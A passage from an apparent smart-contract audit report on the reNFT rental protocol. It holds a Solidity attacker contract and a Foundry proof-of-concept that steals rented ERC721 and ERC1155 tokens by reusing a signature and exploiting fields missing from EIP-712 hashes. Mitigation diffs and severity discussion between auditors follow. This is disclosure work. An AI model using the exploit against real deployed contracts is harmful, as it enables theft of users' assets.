        parameters.offer[0].token = token;
        parameters.offer[0].identifierOrCriteria = tokenId;
        parameters.offer[0].startAmount = amount;
        parameters.offer[0].endAmount = amount;

        return parameters;
    }

    function storeSafe(address _safe) external {
        safe = _safe;
    }

    function storePayOrder(Order calldata _order) external {
        payOrder = _order;
    }

    function storePayeeOrder(Order calldata _order) external {
        payeeOrder = _order;
    }

    function storePayAdvancedOrder(AdvancedOrder calldata _advancedOrder) external {
        payAdvancedOrder = _advancedOrder;
    }

    function storePayeeAdvancedOrder(AdvancedOrder calldata _advancedOrder) external {
        payeeAdvancedOrder = _advancedOrder;
    }

    function storeFulfillment(Fulfillment calldata _fulfillmentERC721, Fulfillment calldata _fulfillmentERC20) external {
        fulfillmentERC721 = _fulfillmentERC721;
        fulfillmentERC20 = _fulfillmentERC20;
    }

    function stopRental(RentalOrder calldata rentalOrder, Stop stop) external {
        stop.stopRent(rentalOrder);
    }

    function stopRentals(RentalOrder[] calldata rentalOrders, Stop stop) external {
        stop.stopRentBatch(rentalOrders);
    }

    function onERC1155Received(
        address ,
        address ,
        uint256 tokenId,
        uint256 amount,
        bytes calldata
    ) external returns (bytes4) {
        address token = msg.sender;

        _executeCallback(ItemType.ERC1155, token, tokenId, amount);

        return this.onERC1155Received.selector;
    }

    function onERC721Received(
        address ,
        address ,
        uint256 tokenId,
        bytes calldata 
    ) external returns (bytes4) {
        address token = msg.sender;
        uint256 amount = 1;

        _executeCallback(ItemType.ERC721, token, tokenId, amount);

        return this.onERC721Received.selector;
    }

    function _executeCallback(ItemType itemType, address token, uint256 tokenId, uint256 amount) internal {
        // update storage for this specific nft
        _initializeNFT(itemType, token, tokenId, amount);

        // approve seaport to handle received NFT 
        _approveSeaportConduit(itemType, token, tokenId);

        // validate pay order 
        _validateOnChain(payOrder);

        // validate payee order
        _validateOnChain(payeeOrder);

        // fulfill order as renter
        _fulfillOrder();
    }

    function _approveSeaportConduit(ItemType itemType, address token, uint256 tokenId) internal {
        if (itemType == ItemType.ERC721) {
            MockERC721(token).approve(seaportConduit, tokenId);
        }
        if (itemType == ItemType.ERC1155) {
            MockERC1155(token).setApprovalForAll(seaportConduit, true);
        }
    }

    function _validateOnChain(Order memory order) internal {
        Order[] memory orders = new Order[](1);
        orders[0] = order;
        seaport.validate(orders);
    }

    function _fulfillOrder() internal {
        AdvancedOrder[] memory advancedOrders = new AdvancedOrder[](2);
        advancedOrders[0] = payAdvancedOrder;
        advancedOrders[1] = payeeAdvancedOrder;

        Fulfillment[] memory fulfillments = new Fulfillment[](2);
        fulfillments[0] = fulfillmentERC721;
        fulfillments[1] = fulfillmentERC20;

        seaport.matchAdvancedOrders(
            advancedOrders,
            new CriteriaResolver[](0),
            fulfillments,
            address(0)
        );
    }

    function _initializeNFT(ItemType itemType, address token, uint256 tokenId, uint256 amount) internal {
        payAdvancedOrder.parameters.offer[0].itemType = itemType;
        payAdvancedOrder.parameters.offer[0].token = token;
        payAdvancedOrder.parameters.offer[0].identifierOrCriteria = tokenId;
        payAdvancedOrder.parameters.offer[0].startAmount = amount;
        payAdvancedOrder.parameters.offer[0].endAmount = amount;

        payeeAdvancedOrder.parameters.consideration[0].itemType = itemType;
        payeeAdvancedOrder.parameters.consideration[0].token = token;
        payeeAdvancedOrder.parameters.consideration[0].identifierOrCriteria = tokenId;
        payeeAdvancedOrder.parameters.consideration[0].startAmount = amount;
        payeeAdvancedOrder.parameters.consideration[0].endAmount = amount;
        payeeAdvancedOrder.parameters.consideration[0].recipient = payable(safe);

        payOrder.parameters.offer[0].itemType = itemType;
        payOrder.parameters.offer[0].token = token;
        payOrder.parameters.offer[0].identifierOrCriteria = tokenId;
        payOrder.parameters.offer[0].startAmount = amount;
        payOrder.parameters.offer[0].endAmount = amount;

        payeeOrder.parameters.consideration[0].itemType = itemType;
        payeeOrder.parameters.consideration[0].token = token;
        payeeOrder.parameters.consideration[0].identifierOrCriteria = tokenId;
        payeeOrder.parameters.consideration[0].startAmount = amount;
        payeeOrder.parameters.consideration[0].endAmount = amount;
        payeeOrder.parameters.consideration[0].recipient = payable(safe);
    }
}

contract StealAllRentedNFTs_POC is BaseTest {

    function testStealAllRentedNFTs() public {
        // ------ Setting up previous state ------ //

        // create and fulfill orders that we will exploit
        (
            Order memory order, 
            OrderMetadata memory metadata, 
            RentalOrder[] memory victimRentalOrders
        ) = _createAndFulfillVictimOrders();

        // ------ Prerequisites ------ //

        // instantiate attackerContract
        AttackerContract attackerContract = new AttackerContract(
            address(conduit), // seaport conduit
            address(erc20s[0]), // token we will use for our rental orders
            seaport
        );

        // send arbitrary # of ERC20 tokens for rental payment to our attackerContract
        erc20s[0].mint(address(attackerContract), victimRentalOrders.length); // we will be stealing from two rentals and use 1 wei for each

        // create a safe for our attackerContract
        address attackerSafe;
        { // to fix stack too deep errors
            address[] memory owners = new address[](1);
            owners[0] = address(attackerContract);
            attackerSafe = factory.deployRentalSafe(owners, 1);
        }
        attackerContract.storeSafe(attackerSafe);

        // obtain generic signature for `RentPayload` 
        // this is done via the front-end for any order and we will then use matching `OrderMetadata.rentDuration` and `OrderMetadata.hooks` fields when creating our new order
        // `RentPayload.intendedFulfiller` will be our attackerContract and `RentPayload.fulfillment` will be our attackerContract's safe
        // any expiration given to us by the front-end would do since we will be executing these actions programmatically
        RentPayload memory rentPayload = RentPayload(
            OrderFulfillment(attackerSafe), 
            metadata, 
            block.timestamp + 100, 
            address(attackerContract)
        ); // using Alice's metadata (order) as an example, but could realistically be any order

        // generate the signature for the payload (simulating signing an order similar to Alice's (metadata only) via the front end)
        bytes memory signature = _signProtocolOrder(
            rentalSigner.privateKey,
            create.getRentPayloadHash(rentPayload)
        );

        // ------ Prep `attackerContract` ------ //

        // precompute `validate()` calldata for new order (PAY order) for on-chain validation
        // re-purpose Alice's order (for simplicity) for our use by replacing all necessary fields with values that pertain to our new order
        order.parameters.offerer = address(attackerContract);
        { // to fix stack too deep errors
            ConsiderationItem[] memory considerationItems = new ConsiderationItem[](0);
            order.parameters.consideration = considerationItems; // no consideration items for a PAY order

            OfferItem[] memory offerItems = new OfferItem[](2);
            // offerItems[0] will change dynamically in our attacker contract
            offerItems[1] = OfferItem({
                itemType: ItemType.ERC20,
                token: address(erc20s[0]),
                identifierOrCriteria: uint256(0),
                startAmount: uint256(1),
                endAmount: uint256(1)
            });

            order.parameters.offer = offerItems;

            order.parameters.totalOriginalConsiderationItems = 0; // 0 since this is a PAY order

            // store `validate()` calldata for PAY order in attackerContract for later use
            attackerContract.storePayOrder(order);
        }

        // precompute `validate()` calldata for new order (PAYEE order) for on-chain validation (attackerContract is offerer and fulfiller)
        { // to fix stack too deep errors
            ConsiderationItem[] memory considerationItems = new ConsiderationItem[](2);
            // considerationItems[0] will change dynamically in our attacker contract
            considerationItems[1] = ConsiderationItem({
                itemType: ItemType.ERC20,
                token: address(erc20s[0]),
                identifierOrCriteria: uint256(0),
                startAmount: uint256(1),
                endAmount: uint256(1),
                recipient: payable(address(ESCRW))
            });

            order.parameters.consideration = considerationItems; // considerationItems for PAYEE mirror offerItems from PAY

            OfferItem[] memory offerItems = new OfferItem[](0);
            order.parameters.offer = offerItems; // no offerItems for PAYEE

            order.parameters.totalOriginalConsiderationItems = 2; // 2 since this is our PAYEE order

            // store `validate()` calldata for PAYEE order in attackerContract for later use
            attackerContract.storePayeeOrder(order);
        }

        // precompute `matchAdvancedOrders()` calldata for fulfillment of the two orders (PAY + PAYEE) and store in attackerContract
        // construct AdvancedOrder[] calldata
        { // to fix stack too deep errors
            rentPayload.metadata.orderType = OrderType.PAY; // modify OrderType to be a PAY order (necessary for exploit). orderType not checked during signature validation
            AdvancedOrder memory payAdvancedOrder = AdvancedOrder(
                attackerContract.getPayOrderParams(), 
                1, 
                1, 
                hex"",  // signature does not matter 
                abi.encode(rentPayload, signature) // extraData. Note: we are re-using the signature we received from alice's metadata
            );
            rentPayload.metadata.orderType = OrderType.PAYEE; // modify OrderType to be a PAYEE order (necessary for exploit). orderType not checked during signature validation
            AdvancedOrder memory payeeAdvancedOrder = AdvancedOrder(
                attackerContract.getPayeeOrderParams(), 
                1, 
                1, 
                hex"",  // signature does not matter 
                abi.encode(rentPayload, signature) // extraData. Note: we are re-using the signature we received from alice's metadata
            );

            // store AdvancedOrder structs in attackerContract for later use
            attackerContract.storePayAdvancedOrder(payAdvancedOrder);
            attackerContract.storePayeeAdvancedOrder(payeeAdvancedOrder);
        }

        // construct Fulfillment[] calldata
        { // to fix stack too deep errors
            FulfillmentComponent[] memory offerCompERC721 = new FulfillmentComponent[](1);
            FulfillmentComponent[] memory considCompERC721 = new FulfillmentComponent[](1);

            offerCompERC721[0] = FulfillmentComponent({orderIndex: 0, itemIndex: 0});
            considCompERC721[0] = FulfillmentComponent({orderIndex: 1, itemIndex: 0});

            FulfillmentComponent[] memory offerCompERC20 = new FulfillmentComponent[](1);
            FulfillmentComponent[] memory considCompERC20 = new FulfillmentComponent[](1);

            offerCompERC20[0] = FulfillmentComponent({orderIndex: 0, itemIndex: 1});
            considCompERC20[0] = FulfillmentComponent({orderIndex: 1, itemIndex: 1});

            Fulfillment memory fulfillmentERC721 = Fulfillment({offerComponents: offerCompERC721, considerationComponents: considCompERC721});
            Fulfillment memory fulfillmentERC20 = Fulfillment({offerComponents: offerCompERC20, considerationComponents: considCompERC20});

            // store Fulfillment[] in attackerContract for later use
            attackerContract.storeFulfillment(fulfillmentERC721, fulfillmentERC20);
        }

        // ------ loop through victimRentalOrders to create our complimentary, malicious rentalOrders ------ //

        // pre-compute `RentalOrder` for our new rental orders
        // compute ZoneParameters.orderHash (this is the orderHash for our PAY order)
        RentalOrder[] memory rentalOrders = new RentalOrder[](victimRentalOrders.length);

        for (uint256 i; i < victimRentalOrders.length; i++) {
            Item memory victimItem = victimRentalOrders[i].items[0];
            ItemType itemType;
            if (victimItem.itemType == reNFTItemType.ERC721) {
                itemType = ItemType.ERC721;
            }
            if (victimItem.itemType == reNFTItemType.ERC1155) {
                itemType = ItemType.ERC1155;
            }

            bytes32 orderHash = seaport.getOrderHash(OrderParametersLib.toOrderComponents(
                attackerContract.getPayOrderParamsToHash(itemType, victimItem.token, victimItem.identifier, victimItem.amount), 0)
            );

            // construct the malicious rental order
            Item[] memory items = new Item[](2);
            items[0] = Item(victimItem.itemType, SettleTo.LENDER, victimItem.token, victimItem.amount, victimItem.identifier);
            items[1] = Item(reNFTItemType.ERC20, SettleTo.RENTER, address(erc20s[0]), uint256(1), uint256(0)); // the same for every malicious order

            RentalOrder memory rentalOrder = RentalOrder({
                seaportOrderHash: orderHash,
                items: items, // only PAY order offer items are added in storage
                hooks: metadata.hooks,
                orderType: OrderType.PAY, // only PAY order is added in storage
                lender: address(attackerContract),
                renter: address(attackerContract),
                rentalWallet: attackerSafe,
                startTimestamp: block.timestamp,
                endTimestamp: block.timestamp + metadata.rentDuration // note: rentDuration does not matter
            });

            // set `rentalOrder.rentalWallet` (currently equal to our attackerContract's safe) to be equal to the victim's safe
            rentalOrder.rentalWallet = victimRentalOrders[i].rentalWallet;

            rentalOrders[i] = rentalOrder;
        }

        // ------ Execute exploit ------ //

        // call `stopRentBatch(rentalOrders)`. All fields pertain to our soon-to-be created orders, except for the `rentalWallet`, which is pointing to the victim's safe
        // attackerContract.stopRental(rentalOrder[0], stop);
        // attackerContract.stopRental(rentalOrder[1], stop);
        attackerContract.stopRentals(rentalOrders, stop);

        // ------ Loop over all victimRentalOrders to verify end state ------ //

        // speed up in time past the victimRentalOrders' expiration
        vm.warp(block.timestamp + 750);

        for (uint256 i; i < victimRentalOrders.length; i++) {
            Item memory victimItem = victimRentalOrders[i].items[0];

            // verify that our attackerContract's safe is now the owner of the NFT
            if (victimItem.itemType == reNFTItemType.ERC721) {
                assertEq(MockERC721(victimItem.token).ownerOf(victimItem.identifier), attackerSafe);
            }
            if (victimItem.itemType == reNFTItemType.ERC1155) {
                assertEq(MockERC1155(victimItem.token).balanceOf(attackerSafe, victimItem.identifier), victimItem.amount);
            }

            // verify that our rentalOrder has been stopped (deleted from storage)
            RentalOrder memory rentalOrder = rentalOrders[i];
            bytes32 rentalOrderHash = create.getRentalOrderHash(rentalOrder);
            assertEq(STORE.orders(rentalOrderHash), false);

            // lender attempts to stop victimRentalOrder, but call fails (renter's safe is no longer the owner of the NFT)
            vm.startPrank(victimRentalOrders[i].lender);
            vm.expectRevert();
            stop.stopRent(victimRentalOrders[i]);
            vm.stopPrank();

            // verify that victimRentalOrder has not been stopped (is still in storage)
            bytes32 victimRentalOrderHash = create.getRentalOrderHash(victimRentalOrders[i]);
            assertEq(STORE.orders(victimRentalOrderHash), true);
        }

        // renters' rental payments to lenders' is still in the escrow contract
        assertEq(erc20s[0].balanceOf(address(ESCRW)), uint256(victimRentalOrders.length * 100));

        // verify that our attackerContract received its rental payment back from all the created malicious orders
        assertEq(erc20s[0].balanceOf(address(attackerContract)), victimRentalOrders.length);

        // End result:
        // 1. Lenders' NFTs were stolen from renters' safe wallet and is now frozen in the attackerContract's safe wallet
        // 2. Renters' rental payments to Lenders are frozen in the Escrow contract since their rentals can not be stoppped
    }

    function _createAndFulfillVictimOrders() internal returns (
        Order memory order, 
        OrderMetadata memory metadata,
        RentalOrder[] memory rentalOrders
    ) {
        // create a BASE order ERC721
        createOrder({
            offerer: alice,
            orderType: OrderType.BASE,
            erc721Offers: 1,
            erc1155Offers: 0,
            erc20Offers: 0,
            erc721Considerations: 0,
            erc1155Considerations: 0,
            erc20Considerations: 1
        });

        // finalize the order creation 
        (
            Order memory order,
            bytes32 orderHash,
            OrderMetadata memory metadata
        ) = finalizeOrder();

        // create an order fulfillment
        createOrderFulfillment({
            _fulfiller: bob,
            order: order,
            orderHash: orderHash,
            metadata: metadata
        });

        // finalize the base order fulfillment
        RentalOrder memory rentalOrderA = finalizeBaseOrderFulfillment();
        bytes32 rentalOrderHash = create.getRentalOrderHash(rentalOrderA);

        // assert that the rental order was stored
        assertEq(STORE.orders(rentalOrderHash), true);

        // assert that the token is in storage
        assertEq(STORE.isRentedOut(address(bob.safe), address(erc721s[0]), 0), true);

        // assert that the fulfiller made a payment
        assertEq(erc20s[0].balanceOf(bob.addr), uint256(9900));

        // assert that a payment was made to the escrow contract
        assertEq(erc20s[0].balanceOf(address(ESCRW)), uint256(100));

        // assert that a payment was synced properly in the escrow contract
        assertEq(ESCRW.balanceOf(address(erc20s[0])), uint256(100));

        // assert that the ERC721 is in the rental wallet of the fulfiller
        assertEq(erc721s[0].ownerOf(0), address(bob.safe));

        // create a BASE order ERC1155
        createOrder({
            offerer: carol,
            orderType: OrderType.BASE,
            erc721Offers: 0,
            erc1155Offers: 1,
            erc20Offers: 0,
            erc721Considerations: 0,
            erc1155Considerations: 0,
            erc20Considerations: 1
        });

        // finalize the order creation 
        (
            order,
            orderHash,
            metadata
        ) = finalizeOrder();

        // create an order fulfillment
        createOrderFulfillment({
            _fulfiller: dan,
            order: order,
            orderHash: orderHash,
            metadata: metadata
        });

        // finalize the base order fulfillment
        RentalOrder memory rentalOrderB = finalizeBaseOrderFulfillment();
        rentalOrderHash = create.getRentalOrderHash(rentalOrderB);

        // assert that the rental order was stored
        assertEq(STORE.orders(rentalOrderHash), true);

        // assert that the token is in storage
        assertEq(STORE.isRentedOut(address(dan.safe), address(erc1155s[0]), 0), true);

        // assert that the fulfiller made a payment
        assertEq(erc20s[0].balanceOf(dan.addr), uint256(9900));

        // assert that a payment was made to the escrow contract
        assertEq(erc20s[0].balanceOf(address(ESCRW)), uint256(200));

        // assert that a payment was synced properly in the escrow contract
        assertEq(ESCRW.balanceOf(address(erc20s[0])), uint256(200));

        // assert that the ERC721 is in the rental wallet of the fulfiller
        assertEq(erc1155s[0].balanceOf(address(dan.safe), 0), uint256(100));

        RentalOrder[] memory rentalOrders = new RentalOrder[](2);
        rentalOrders[0] = rentalOrderA;
        rentalOrders[1] = rentalOrderB;

        return (order, metadata, rentalOrders);
    }
}

Additional PoC for "lesser" high severity/impact vulnerability achieved via only exploiting bug #2: reNFT-StealERC1155Tokens_PoC.md

Tools Used

manual

Recommended Mitigation Steps

By addressing the non-compliant EIP-712 functions we can mitigate the main exploit path described in this report. I would suggest the following changes:

diff --git a/./src/packages/Signer.sol b/./src/packages/Signer.sol
index 6edf32c..ab7e62e 100644
--- a/./src/packages/Signer.sol
+++ b/./src/packages/Signer.sol
@@ -188,6 +188,7 @@ abstract contract Signer {
                     order.orderType,
                     order.lender,
                     order.renter,
+                    order.rentalWallet,
                     order.startTimestamp,
                     order.endTimestamp
                 )
diff --git a/./src/packages/Signer.sol b/./src/packages/Signer.sol
index 6edf32c..c2c375c 100644
--- a/./src/packages/Signer.sol
+++ b/./src/packages/Signer.sol
@@ -232,8 +232,10 @@ abstract contract Signer {
             keccak256(
                 abi.encode(
                     _ORDER_METADATA_TYPEHASH,
+                    metadata.orderType,
                     metadata.rentDuration,
-                    keccak256(abi.encodePacked(hookHashes))
+                    keccak256(abi.encodePacked(hookHashes)),
+                    metadata.emittedExtraData
                 )
             );
     }

I would also suggest that the RentPayload, which is the signature digest of the server-side signer, be modified to include a field that is unique to the specific order that is being signed. This would disable users from obtaining a single signature and utilizing that signature arbitrarily (for multiple fulfillments/fulfill otherwise "restricted" orders).

Assessed type

Other

c4-pre-sort commented 9 months ago

141345 marked the issue as duplicate of #239

c4-judge commented 8 months ago

0xean changed the severity to 2 (Med Risk)

c4-judge commented 8 months ago

0xean marked the issue as satisfactory

0xJCN commented 8 months ago

Hi @0xean,

I believe this report should be labeled as high severity since it demonstrates a way for an attacker to directly steal and freeze user assets. In addition, I would like to bring some details to your attention that may have been overlooked. My report discusses an exploit path which leverages 3 distinct bugs. Below I will list the primary reports that have been labeled for each of these bugs:

Based on the information above, I would like to ask you to please re-evaluate this report. I believe this report can potentially be handled in one of two ways:

  1. Considering the fact that this report demonstrates the Identification and demonstration of the maximum achievable impact of the root cause (for each root cause identified above) by combining the 3 root causes, this report can be labeled as primary and all other reports mentioned above (including their duplicates) can be considered duplicates of this report (severity will not be the same between all duplicates since most fail to demonstrate high severity impacts).
  2. Since this report demonstrates a unique impact via the combination of the 3 distinct root causes listed above, this report can be considered as a primary with no duplicates (stand alone report).

I appreciate you taking the time to read my comment.

Edit: Tagging the sponsor in case they would like to observe, confirm the POC provided in my report.

@Alec1017

c4-judge commented 8 months ago

0xean marked the issue as not a duplicate

c4-judge commented 8 months ago

0xean marked the issue as duplicate of #385

0xean commented 8 months ago

@0xJCN - good news, it is high since a dupe of #385 and will be upgraded along with all other dupes here.

Also good news is that I think this should be in the report.

c4-judge commented 8 months ago

0xean changed the severity to 3 (High Risk)

0xJCN commented 8 months ago

Hi @0xean,

Thank you for taking the time to address the issues in my previous comments.

I believe all duplicates of this report show a lesser impact than what this report demonstrates. For this reason, I believe each duplicate should receive some amount of partial credit since they do not fulfill the requisites for a full mark. Here are the requisites for a full mark as defined in the supreme-court-decisions-fall-2023:

The requisites of a full mark report are:

  • Identification and demonstration of the root cause
  • Identification and demonstration of the maximum achievable impact of the root cause

This report demonstrates how an attacker can steal any, and multiple, NFTs (ERC721 & ERC1155) at once. Additionally, the attacker does not need to own any NFTs prior or create any rental orders themself prior to the exploit (rental orders are created during the exploit and immediately stopped in the same tx). For reference, the current duplicates (the ones that do not have 25% partial credit) demonstrate how an attacker can only steal ERC1155 tokens. Moreover, for this lesser impact the attacker must first own an ERC1155 of the same tokenId as the victim and must also create a rental order prior to the exploit.

Based on the information above, I believe the duplicates of this report fail to fulfill the second requisite for a full mark: Identification and demonstration of the maximum achievable impact of the root cause.

Thank you for taking the time to read my additional comment.

stalinMacias commented 8 months ago

@0xean The maximum impact this report demonstrates is that actively rented NFTs can be stolen and therefore affected rentals are freezed, and this impact is actually already demonstrated in a lot of the duplicates of this issue.

Here are a few examples but not limited to:

454 (steal rentals) "Missing rentalWallet field in orderHash allows stealing from other rental wallets"

171 (steal rentals) "Missing hash parameter can cause safes to be drained"

241 (steal rentals) "Lender can call stopRent() of their ERC1155 order and withdraw the tokens from a different safe than the original recipient of the order"

385 (freeze rentals)"Missing rentalWallet in signature leads to bricked ERC1155 rentals and stuck assets"

I believe all duplicates of this report show a lesser impact than what this report demonstrates.

Therefore, I don't think this is true.

0xJCN commented 8 months ago

@stalinMacias

This report demonstrates how an attacker can steal any, and multiple, NFTs (ERC721 & ERC1155) at once. Additionally, the attacker does not need to own any NFTs prior or create any rental orders themself prior to the exploit (rental orders are created during the exploit and immediately stopped in the same tx). For reference, the current duplicates (the ones that do not have 25% partial credit) demonstrate how an attacker can only steal ERC1155 tokens. Moreover, for this lesser impact the attacker must first own an ERC1155 of the same tokenId as the victim and must also create a rental order prior to the exploit.

This paragraph explains the justification for my statement. In my opinion, the impacts differ as I explained above. I believe the above statement also explains that the exploit in this report has a higher likely-hood of occurring than the duplicates. The range of affected NFTs is also greater. This report specifies the theft of ERC1155 and ERC721 tokens. The requirements for the attacker are also less for this exploit: attacker does not need to own any NFTs prior to exploit. Meanwhile, the duplicates require the attacker to own ERC1155 tokens of the same tokenId as the token they are stealing, and the attacker must have an active rental for that ERC1155.

c4-judge commented 8 months ago

0xean marked the issue as selected for report

c4-judge commented 8 months ago

0xean marked the issue as primary issue

c4-sponsor commented 8 months ago

Alec1017 (sponsor) confirmed